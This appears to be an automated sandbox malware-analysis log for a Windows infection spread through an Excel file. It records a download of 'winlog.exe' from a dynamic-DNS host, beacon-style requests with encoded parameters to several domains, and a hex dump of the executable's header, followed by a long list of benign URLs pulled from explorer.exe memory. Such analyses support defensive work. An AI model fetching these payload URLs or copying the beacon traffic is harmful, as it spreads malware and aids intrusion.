          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 06:59:27 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 27 Jan 2021 03:42:34 GMTETag: "e5000-5b9d98fc079e9"Accept-Ranges: bytesContent-Length: 937984Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2a e1 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 44 0e 00 00 0a 00 00 00 00 00 00 ca 62 0e 00 00 20 00 00 00 80 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 62 0e 00 4f 00 00 00 00 80 0e 00 ac 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 42 0e 00 00 20 00 00 00 44 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 06 00 00 00 80 0e 00 00 08 00 00 00 46 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0e 00 00 02 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 62 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 98 43 02 00 f0 5b 01 00 03 00 00 00 01 00 00 06 88 9f 03 00 f0 c2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 70 04 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0
          Source: global trafficHTTP traffic detected: GET /aky/?MrIpf=y480GprHQ4MP&flX0DJ5=mHx4rV5tLr28MmvSGkxB9LVhRseCNR332GkcowizwEXSFPKeI/LlmY6x2m1vfw1VmIUMbA== HTTP/1.1Host: www.thecreatorsbook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aky/?flX0DJ5=05+amzhYswt9PeC6lvAIMRVwbnzaBXISDzTzfjSF7Rcoln5AjWTXUDXDqxezrh5vP7DX0Q==&MrIpf=y480GprHQ4MP HTTP/1.1Host: www.diversitypatriots.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.125.191.208 103.125.191.208
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
          Source: global trafficHTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chise2neversndywalka.dns.armyConnection: Keep-Alive
          Source: C:\Windows\explorer.exeCode function: 6_2_0297A782 getaddrinfo,setsockopt,recv,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C310A0EB.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chise2neversndywalka.dns.armyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /aky/?MrIpf=y480GprHQ4MP&flX0DJ5=mHx4rV5tLr28MmvSGkxB9LVhRseCNR332GkcowizwEXSFPKeI/LlmY6x2m1vfw1VmIUMbA== HTTP/1.1Host: www.thecreatorsbook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aky/?flX0DJ5=05+amzhYswt9PeC6lvAIMRVwbnzaBXISDzTzfjSF7Rcoln5AjWTXUDXDqxezrh5vP7DX0Q==&MrIpf=y480GprHQ4MP HTTP/1.1Host: www.diversitypatriots.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: chise2neversndywalka.dns.army
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2181552252.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2180212488.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2180212488.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000002.2380112198.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
